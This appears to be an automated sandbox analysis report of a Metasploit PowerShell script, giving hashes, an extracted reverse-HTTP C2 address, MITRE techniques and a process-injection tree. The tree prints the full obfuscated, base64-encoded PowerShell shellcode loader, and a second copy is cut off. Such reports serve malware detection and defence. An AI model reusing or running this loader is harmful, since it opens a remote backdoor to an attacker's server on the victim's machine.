metasploit | 405f7c89ba1cfa0a548c40dff89d003a06d6ad6fa8fa50bcd37f83cfc9bfa431

General

Target

ps1004.ps1
Size

8KB
MD5

1195ad87cfc060272b60133c613b928e
SHA1

d6325814107fd10ba6f63a11ecb5b796553b291b
SHA256

405f7c89ba1cfa0a548c40dff89d003a06d6ad6fa8fa50bcd37f83cfc9bfa431
SHA512

f0609f25c9c95cb6ec6419e6c93332731a621243a02416c4f15b0edcbf7ffc12382c08cd5a65a9fc765b62cb2e8967ca7edee027e726b061d139615588489199
SSDEEP

96:zCTRX/T7Dh9pPKZT3Aasj0AwCATxuc23s5GeaWy7V1Xf4ymxtgqkfuaMk09clOm:zaF7Dh/PO3AaI2LxUlC5xtgqkfhMzcOm

Score

10^/10

metasploit backdoor discovery execution trojan

Malware Config

Extracted

Family

metasploit

Version

encoder/shikata_ga_nai

Extracted

Family

metasploit

Version

windows/reverse_http

C2

http://192.168.18.129:8080/UY2jjW-iTdaTLZIs9Bq1pQ1u1z9L8

Signatures

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Metasploit family
metasploit
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

2432 powershell.exe

pid	process
2432	powershell.exe

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

cvtres.exepowershell.execsc.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

pid process

2432 powershell.exe
2300 powershell.exe
2712 powershell.exe
2772 powershell.exe

pid	process
2432	powershell.exe
2300	powershell.exe
2712	powershell.exe
2772	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2432	powershell.exe
Token: SeDebugPrivilege	2300	powershell.exe
Token: SeDebugPrivilege	2712	powershell.exe
Token: SeDebugPrivilege	2772	powershell.exe

Suspicious use of WriteProcessMemory 18 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.execsc.exe

description	pid	process	target process
PID 2432 wrote to memory of 2300	2432	powershell.exe	powershell.exe
PID 2432 wrote to memory of 2300	2432	powershell.exe	powershell.exe
PID 2432 wrote to memory of 2300	2432	powershell.exe	powershell.exe
PID 2300 wrote to memory of 2712	2300	powershell.exe	powershell.exe
PID 2300 wrote to memory of 2712	2300	powershell.exe	powershell.exe
PID 2300 wrote to memory of 2712	2300	powershell.exe	powershell.exe
PID 2712 wrote to memory of 2772	2712	powershell.exe	powershell.exe
PID 2712 wrote to memory of 2772	2712	powershell.exe	powershell.exe
PID 2712 wrote to memory of 2772	2712	powershell.exe	powershell.exe
PID 2712 wrote to memory of 2772	2712	powershell.exe	powershell.exe
PID 2772 wrote to memory of 2144	2772	powershell.exe	csc.exe
PID 2772 wrote to memory of 2144	2772	powershell.exe	csc.exe
PID 2772 wrote to memory of 2144	2772	powershell.exe	csc.exe
PID 2772 wrote to memory of 2144	2772	powershell.exe	csc.exe
PID 2144 wrote to memory of 1344	2144	csc.exe	cvtres.exe
PID 2144 wrote to memory of 1344	2144	csc.exe	cvtres.exe
PID 2144 wrote to memory of 1344	2144	csc.exe	cvtres.exe
PID 2144 wrote to memory of 1344	2144	csc.exe	cvtres.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\ps1004.ps1
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2432
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -C "sv FDG -;sv Q ec;sv ZzY ((gv FDG).value.toString()+(gv Q).value.toString());powershell (gv ZzY).value.toString() 'JABGAHMAcwAgAD0AIAAnACQAcwB1AGsAIAA9ACAAJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAcwB1AGsAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAZABiACwAMAB4AGQANQAsADAAeABiAGEALAAwAHgANAA3ACwAMAB4ADUAZgAsADAAeAA3ADkALAAwAHgANgA3ACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeAA1AGUALAAwAHgAMwAxACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANgAzACwAMAB4ADgAMwAsADAAeABlAGUALAAwAHgAZgBjACwAMAB4ADMAMQAsADAAeAA1ADYALAAwAHgAMQA2ACwAMAB4ADAAMwAsADAAeAA1ADYALAAwAHgAMQA2ACwAMAB4AGUAMgAsADAAeABiADIALAAwAHgAYQAzACwAMAB4ADkAMQAsADAAeABlADgALAAwAHgAMwBjACwAMAB4ADUAYwAsADAAeAA2ADIALAAwAHgAOQA3ACwAMAB4ADAAZAAsADAAeAA4AGUALAAwAHgAMAA2ACwAMAB4AGQAYwAsADAAeAAzAGYALAAwAHgAMQBlACwAMAB4ADQAYwAsADAAeABiADAALAAwAHgAYgAzACwAMAB4AGQANQAsADAAeAAwADAALAAwAHgAMgAxACwAMAB4ADQAMgAsADAAeAAwAGMALAAwAHgAOQA1ACwAMAB4AGIANgAsADAAeABkAGYALAAwAHgAYgBkACwAMAB4AGYAZQAsADAAeAA0ADcALAAwAHgANgA4ACwAMAB4ADAAYgAsADAAeABkADkALAAwAHgANgA2ACwAMAB4ADUANgAsADAAeAAyADAALAAwAHgAMQA5ACwAMAB4AGUAOAAsADAAeAAyAGEALAAwAHgAMwBiACwAMAB4ADQAZQAsADAAeABjAGEALAAwAHgAMQAzACwAMAB4AGYANAAsADAAeAA4ADMALAAwAHgAMABiACwAMAB4ADUANAAsADAAeAA0ADIALAAwAHgAZQA5ACwAMAB4AGUANAAsADAAeAAwADgALAAwAHgAMAAyACwAMAB4ADkAYQAsADAAeABhADkALAAwAHgAYgBjACwAMAB4ADIANwAsADAAeABkAGUALAAwAHgANwAxACwAMAB4AGIAZAAsADAAeABlADcALAAwAHgANQA0ACwAMAB4AGMAOQAsADAAeABjADUALAAwAHgAOAAyACwAMAB4AGEAYgAsADAAeABiAGUALAAwAHgANwA5ACwAMAB4ADgAYwAsADAAeABmAGIALAAwAHgANgBmACwAMAB4ADAAYQAsADAAeABjADYALAAwAHgAZQAzACwAMAB4ADAANAAsADAAeAA1ADQALAAwAHgAZgA3ACwAMAB4ADEAMgAsADAAeABjADgALAAwAHgAZQAxACwAMAB4ADMAZQAsADAAeAA2ADAALAAwAHgAZAAyACwAMAB4AGEAMAAsADAAeAA0AGIALAAwAHgAYgBkACwAMAB4AGEAMQAsADAAeAAwADMALAAwAHgAYgAzACwAMAB4AGIAZgAsADAAeAA2ADMALAAwAHgANQAyACwAMAB4ADgAYgAsADAAeAAwADEALAAwAHgANAA0ACwAMAB4ADkAOQAsADAAeABhADcALAAwAHgAOAAzACwAMAB4ADkAYwAsADAAeAA5ADkALAAwAHgANQA3ACwAMAB4AGYANgAsADAAeABkADYALAAwAHgAZABhACwAMAB4AGUAYQAsADAAeAAwADEALAAwAHgAMgBkACwAMAB4AGEAMQAsADAAeAAzADAALAAwAHgAOAA3ACwAMAB4AGIAMgAsADAAeAAwADEALAAwAHgAYgAyACwAMAB4ADMAZgAsADAAeAAxADcALAAwAHgAYgAwACwAMAB4ADEANwAsADAAeABkADkALAAwAHgAZABjACwAMAB4AGIAZQAsADAAeABkAGMALAAwAHgAYQBkACwAMAB4AGIAYgAsADAAeABhADIALAAwAHgAZQAzACwAMAB4ADYAMgAsADAAeABiADAALAAwAHgAZABlACwAMAB4ADYAOAAsADAAeAA4ADUALAAwAHgAMQA3ACwAMAB4ADUANwAsADAAeAAyAGEALAAwAHgAYQAyACwAMAB4AGIAMwAsADAAeAAzAGMALAAwAHgAZQA4ACwAMAB4AGMAYgAsADAAeABlADIALAAwAHgAOQA4ACwAMAB4ADUAZgAsADAAeABmADMALAAwAHgAZgA1ACwAMAB4ADQANAAsADAAeAAzAGYALAAwAHgANQAxACwAMAB4ADcAZAAsADAAeAA2ADYALAAwAHgANQA2ACwAMAB4AGUANQAsADAAeAA3AGUALAAwAHgANwA5ACwAMAB4ADUANwAsADAAeABiAGIALAAwAHgAZQA4ACwAMAB4AGUAYgAsADAAeABjAGQALAAwAHgAMwAwACwAMAB4AGUAOQAsADAAeAA5AGIALAAwAHgANwBhACwAMAB4AGQAMAAsADAAeAA4ADcALAAwAHgAMwAyACwAMAB4AGQAMQAsADAAeAA0AGEALAAwAHgAMQA0ACwAMAB4AGIAMwAsADAAeABmAGYALAAwAHgAOABkACwAMAB4ADUAYgAsADAAeABlAGUALAAwAHgAMwAxACwAMAB4ADQAOQAsADAAeABmADAALAAwAHgANAAzACwAMAB4ADYAMQAsADAAeAAzAGUALAAwAHgAYQA0ACwAMAB4ADAAYgAsADAAeABiAGYALAAwAHgAOQA2ACwAMAB4ADMAMwAsADAAeAA2AGMALAAwAHgANAAwACwAMAB4AGMAMwAsADAAeAA5ADcALAAwAHgAMgAxACwAMAB4AGQANQAsADAAeABlAGYALAAwAHgANAA0ACwAMAB4ADkANgAsADAAeAA0ADEALAAwAHgANgAwACwAMAB4ADcANQAsADAAeAAxADgALAAwAHgAOQAyACwAMAB4ADYAOAAsADAAeAAzAGEALAAwAHgAMQA4ACwAMAB4ADkAMgAsADAAeAA2ADgALAAwAHgAMQA0ACwAMAB4ADQAZAAsADAAeABjAGIALAAwAHgANQBhACwAMAB4ADAAMAAsADAAeAAwADcALAAwAHgAYgBjACwAMAB4AGIANwAsADAAeABiAGQALAAwAHgAOAAzACwAMAB4ADIANgAsADAAeABhADkALAAwAHgANgA5ACwAMAB4ADYANwAsADAAeABmAGQALAAwAHgANgAwACwAMAB4AGUAMQAsADAAeAA0AGUALAAwAHgANAAzACwAMAB4ADAAMgAsADAAeAAzADQALAAwAHgAYwAwACwAMAB4ADEAMgAsADAAeABkADUALAAwAHgANAAzACwAMAB4ADEAMQAsADAAeABlAGYALAAwAHgAMgBjACwAMAB4AGUAMAAsADAAeAA2ADkALAAwAHgAMABmACwAMAB4ADEAZgAsADAAeAA5ADAALAAwAHgAZABlACwAMAB4ADgANgAsADAAeAAwADAALAAwAHgAYQA2ACwAMAB4ADEAZgAsADAAeAA0AGQALAAwAHgAYgA3ACwAMAB4AGUAMQAsADAAeAA4AGMALAAwAHgAMAA2ACwAMAB4AGMAOAAsADAAeABkAGYALAAwAHgAZABhACwAMAB4ADUAMwAsADAAeAA5AGIALAAwAHgANABjACwAMAB4ADQAOQAsADAAeAAwAGIALAAwAHgANABmACwAMAB4ADIANQAsADAAeAAwADUALAAwAHgANQA4ACwAMAB4ADMAYQAsADAAeABlADcALAAwAHgAZQBlACwAMAB4ADYAMQAsADAAeAAxADAALAAwAHgANgAxACwAMAB4ADcAYQAsADAAeAA5ADQALAAwAHgAYwA0ACwAMAB4AGUANgAsADAAeABmAGEALAAwAHgAOQBiACwAMAB4AGYAYQAsADAAeABmADYALAAwAHgANwAzACwAMAB4ADMAYgAsADAAeAA5ADAALAAwAHgAZgAyACwAMAB4AGQAMwAsADAAeABkADYALAAwAHgANwBhACwAMAB4AGEAZAAsADAAeABiAGIALAAwAHgANQAzACwAMAB4AGMAMwAsADAAeABjAGYALAAwAHgAYgBkACwAMAB4ADYAMwAsADAAeAAxAGUALAAwAHgAYgBjACwAMAB4ADkAMgAsADAAeABjADgALAAwAHgAZgAyACwAMAB4ADEANQAsADAAeAA3AGMALAAwAHgAYwAyACwAMAB4AGYAMgAsADAAeAA4ADEALAAwAHgAMAA3ACwAMAB4AGUAMwAsADAAeAAyAGUALAAwAHgAMwA0ACwAMAB4ADMANwAsADAAeAA2AGUALAAwAHgAYwA3ACwAMAB4ADUAZgAsADAAeAAzAGYALAAwAHgAOAAyACwAMAB4AGUANwAsADAAeAA5AGYALAAwAHgANQA3ACwAMAB4AGUAMQAsADAAeAAxADcALAAwAHgAYQBhACwAMAB4ADQANwAsADAAeAAxADYALAAwAHgAMAAyACwAMAB4ADkAYQAsADAAeABmADIALAAwAHgAMgA0ACwAMAB4AGMANQAsADAAeABkADUALAAwAHgANAA5ACwAMAB4ADEANAAsADAAeAA0ADAALAAwAHgAZQA5ACwAMAB4ADYANAAsADAAeAAzADMALAAwAHgAMgBkACwAMAB4ADcAZAAsADAAeAA4ADYALAAwAHgAZAA0ACwAMAB4AGEAZAAsADAAeAA3AGQALAAwAHgAZQBlACwAMAB4AGQANAAsADAAeABhAGQALAAwAHgAMwBkACwAMAB4AGUAZQAsADAAeAA4ADcALAAwAHgAYwA1ACwAMAB4AGUANQAsADAAeAA0AGEALAAwAHgANwA0ACwAMAB4AGYAMwAsADAAeABlADkALAAwAHgANAA3ACwAMAB4AGUAOAAsADAAeABhADgALAAwAHgANAA2ACwAMAB4AGUAZQAsADAAeABlADgALAAwAHgAMQA4ACwAMAB4ADAAMQAsADAAeABmADAALAAwAHgAZAA2ACwAMAB4AGEANgAsADAAeABkADEALAAwAHgAYQAzACwAMAB4ADQAMAAsADAAeABjAGYALAAwAHgAYwAzACwAMAB4AGQANQAsADAAeABlADQALAAwAHgAZQBkACwAMAB4ADEAYgAsADAAeAAwAGMALAAwAHgANwAzACwAMAB4ADMAMQAsADAAeAA5ADcALAAwAHgANgAzACwAMAB4AGYANwAsADAAeABiADUALAAwAHgANQA5ACwAMAB4AGIAOAAsADAAeAA4AGQALAAwAHgANwBhACwAMAB4ADIAYwAsADAAeABkAGIALAAwAHgAZAA2ACwAMAB4AGIAOQAsADAAeAA5ADAALAAwAHgAYwBiACwAMAB4ADgAZQAsADAAeABjADIALAAwAHgAZAAwACwAMAB4AGYANAAsADAAeAA2ADAALAAwAHgAMAA0ACwAMAB4ADEAZAAsADAAeAAyADQALAAwAHgAYgAyACwAMAB4ADQAMAAsADAAeAA1ADkALAAwAHgAMQA2ACwAMAB4ADgANQAsADAAeAA5ADQALAAwAHgAYgA3ACwAMAB4ADUANwAsADAAeABkADcALAAwAHgAZABkACwAMAB4AGMANwA7ACQAZwAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJAB6AC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAAwACkAewAkAGcAIAA9ACAAJAB6AC4ATABlAG4AZwB0AGgAfQA7ACQAdQBTAGwAawA9ACQAdwA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADAALAAkAGcALAAwAHgANAAwACkAOwBmAG8AcgAgACgAJABpAD0AMAA7ACQAaQAgAC0AbABlACAAKAAkAHoALgBMAGUAbgBnAHQAaAAtADEAKQA7ACQAaQArACsAKQAgAHsAJAB3ADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQAdQBTAGwAawAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAdQBTAGwAawAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAOwApAHsAUwB0AGEAcgB0AC0AcwBsAGUAZQBwACAANgAwAH0AOwAnADsAJABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkAEYAcwBzACkAKQA7ACQAWgBmAEUAIAA9ACAAIgAtAGUAYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQAZQBXAG0AIAA9ACAAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAIAArACAAIgBcAHMAeQBzAHcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsACIAOwBpAGUAeAAgACIAJgAgACQAZQBXAG0AIAAkAFoAZgBFACAAJABlACIAfQBlAGwAcwBlAHsAOwBpAGUAeAAgACIAJgAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAkAFoAZgBFACAAJABlACIAOwB9AA=='"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2300
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ec JABGAHMAcwAgAD0AIAAnACQAcwB1AGsAIAA9ACAAJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAcwB1AGsAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAZABiACwAMAB4AGQANQAsADAAeABiAGEALAAwAHgANAA3ACwAMAB4ADUAZgAsADAAeAA3ADkALAAwAHgANgA3ACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeAA1AGUALAAwAHgAMwAxACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANgAzACwAMAB4ADgAMwAsADAAeABlAGUALAAwAHgAZgBjACwAMAB4ADMAMQAsADAAeAA1ADYALAAwAHgAMQA2ACwAMAB4ADAAMwAsADAAeAA1ADYALAAwAHgAMQA2ACwAMAB4AGUAMgAsADAAeABiADIALAAwAHgAYQAzACwAMAB4ADkAMQAsADAAeABlADgALAAwAHgAMwBjACwAMAB4ADUAYwAsADAAeAA2ADIALAAwAHgAOQA3ACwAMAB4ADAAZAAsADAAeAA4AGUALAAwAHgAMAA2ACwAMAB4AGQAYwAsADAAeAAzAGYALAAwAHgAMQBlACwAMAB4ADQAYwAsADAAeABiADAALAAwAHgAYgAzACwAMAB4AGQANQAsADAAeAAwADAALAAwAHgAMgAxACwAMAB4ADQAMgAsADAAeAAwAGMALAAwAHgAOQA1ACwAMAB4AGIANgAsADAAeABkAGYALAAwAHgAYgBkACwAMAB4AGYAZQAsADAAeAA0ADcALAAwAHgANgA4ACwAMAB4ADAAYgAsADAAeABkADkALAAwAHgANgA2ACwAMAB4ADUANgAsADAAeAAyADAALAAwAHgAMQA5ACwAMAB4AGUAOAAsADAAeAAyAGEALAAwAHgAMwBiACwAMAB4ADQAZQAsADAAeABjAGEALAAwAHgAMQAzACwAMAB4AGYANAAsADAAeAA4ADMALAAwAHgAMABiACwAMAB4ADUANAAsADAAeAA0ADIALAAwAHgAZQA5ACwAMAB4AGUANAAsADAAeAAwADgALAAwAHgAMAAyACwAMAB4ADkAYQAsADAAeABhADkALAAwAHgAYgBjACwAMAB4ADIANwAsADAAeABkAGUALAAwAHgANwAxACwAMAB4AGIAZAAsADAAeABlADcALAAwAHgANQA0ACwAMAB4AGMAOQAsADAAeABjADUALAAwAHgAOAAyACwAMAB4AGEAYgAsADAAeABiAGUALAAwAHgANwA5ACwAMAB4ADgAYwAsADAAeABmAGIALAAwAHgANgBmACwAMAB4ADAAYQAsADAAeABjADYALAAwAHgAZQAzACwAMAB4ADAANAAsADAAeAA1ADQALAAwAHgAZgA3ACwAMAB4ADEAMgAsADAAeABjADgALAAwAHgAZQAxACwAMAB4ADMAZQAsADAAeAA2ADAALAAwAHgAZAAyACwAMAB4AGEAMAAsADAAeAA0AGIALAAwAHgAYgBkACwAMAB4AGEAMQAsADAAeAAwADMALAAwAHgAYgAzACwAMAB4AGIAZgAsADAAeAA2ADMALAAwAHgANQAyACwAMAB4ADgAYgAsADAAeAAwADEALAAwAHgANAA0ACwAMAB4ADkAOQAsADAAeABhADcALAAwAHgAOAAzACwAMAB4ADkAYwAsADAAeAA5ADkALAAwAHgANQA3ACwAMAB4AGYANgAsADAAeABkADYALAAwAHgAZABhACwAMAB4AGUAYQAsADAAeAAwADEALAAwAHgAMgBkACwAMAB4AGEAMQAsADAAeAAzADAALAAwAHgAOAA3ACwAMAB4AGIAMgAsADAAeAAwADEALAAwAHgAYgAyACwAMAB4ADMAZgAsADAAeAAxADcALAAwAHgAYgAwACwAMAB4ADEANwAsADAAeABkADkALAAwAHgAZABjACwAMAB4AGIAZQAsADAAeABkAGMALAAwAHgAYQBkACwAMAB4AGIAYgAsADAAeABhADIALAAwAHgAZQAzACwAMAB4ADYAMgAsADAAeABiADAALAAwAHgAZABlACwAMAB4ADYAOAAsADAAeAA4ADUALAAwAHgAMQA3ACwAMAB4ADUANwAsADAAeAAyAGEALAAwAHgAYQAyACwAMAB4AGIAMwAsADAAeAAzAGMALAAwAHgAZQA4ACwAMAB4AGMAYgAsADAAeABlADIALAAwAHgAOQA4ACwAMAB4ADUAZgAsADAAeABmADMALAAwAHgAZgA1ACwAMAB4ADQANAAsADAAeAAzAGYALAAwAHgANQAxACwAMAB4ADcAZAAsADAAeAA2ADYALAAwAHgANQA2ACwAMAB4AGUANQAsADAAeAA3AGUALAAwAHgANwA5ACwAMAB4ADUANwAsADAAeABiAGIALAAwAHgAZQA4ACwAMAB4AGUAYgAsADAAeABjAGQALAAwAHgAMwAwACwAMAB4AGUAOQAsADAAeAA5AGIALAAwAHgANwBhACwAMAB4AGQAMAAsADAAeAA4ADcALAAwAHgAMwAyACwAMAB4AGQAMQAsADAAeAA0AGEALAAwAHgAMQA0ACwAMAB4AGIAMwAsADAAeABmAGYALAAwAHgAOABkACwAMAB4ADUAYgAsADAAeABlAGUALAAwAHgAMwAxACwAMAB4ADQAOQAsADAAeABmADAALAAwAHgANAAzACwAMAB4ADYAMQAsADAAeAAzAGUALAAwAHgAYQA0ACwAMAB4ADAAYgAsADAAeABiAGYALAAwAHgAOQA2ACwAMAB4ADMAMwAsADAAeAA2AGMALAAwAHgANAAwACwAMAB4AGMAMwAsADAAeAA5ADcALAAwAHgAMgAxACwAMAB4AGQANQAsADAAeABlAGYALAAwAHgANAA0ACwAMAB4ADkANgAsADAAeAA0ADEALAAwAHgANgAwACwAMAB4ADcANQAsADAAeAAxADgALAAwAHgAOQAyACwAMAB4ADYAOAAsADAAeAAzAGEALAAwAHgAMQA4ACwAMAB4ADkAMgAsADAAeAA2ADgALAAwAHgAMQA0ACwAMAB4ADQAZAAsADAAeABjAGIALAAwAHgANQBhACwAMAB4ADAAMAAsADAAeAAwADcALAAwAHgAYgBjACwAMAB4AGIANwAsADAAeABiAGQALAAwAHgAOAAzACwAMAB4ADIANgAsADAAeABhADkALAAwAHgANgA5ACwAMAB4ADYANwAsADAAeABmAGQALAAwAHgANgAwACwAMAB4AGUAMQAsADAAeAA0AGUALAAwAHgANAAzACwAMAB4ADAAMgAsADAAeAAzADQALAAwAHgAYwAwACwAMAB4ADEAMgAsADAAeABkADUALAAwAHgANAAzACwAMAB4ADEAMQAsADAAeABlAGYALAAwAHgAMgBjACwAMAB4AGUAMAAsADAAeAA2ADkALAAwAHgAMABmACwAMAB4ADEAZgAsADAAeAA5ADAALAAwAHgAZABlACwAMAB4ADgANgAsADAAeAAwADAALAAwAHgAYQA2ACwAMAB4ADEAZgAsADAAeAA0AGQALAAwAHgAYgA3ACwAMAB4AGUAMQAsADAAeAA4AGMALAAwAHgAMAA2ACwAMAB4AGMAOAAsADAAeABkAGYALAAwAHgAZABhACwAMAB4ADUAMwAsADAAeAA5AGIALAAwAHgANABjACwAMAB4ADQAOQAsADAAeAAwAGIALAAwAHgANABmACwAMAB4ADIANQAsADAAeAAwADUALAAwAHgANQA4ACwAMAB4ADMAYQAsADAAeABlADcALAAwAHgAZQBlACwAMAB4ADYAMQAsADAAeAAxADAALAAwAHgANgAxACwAMAB4ADcAYQAsADAAeAA5ADQALAAwAHgAYwA0ACwAMAB4AGUANgAsADAAeABmAGEALAAwAHgAOQBiACwAMAB4AGYAYQAsADAAeABmADYALAAwAHgANwAzACwAMAB4ADMAYgAsADAAeAA5ADAA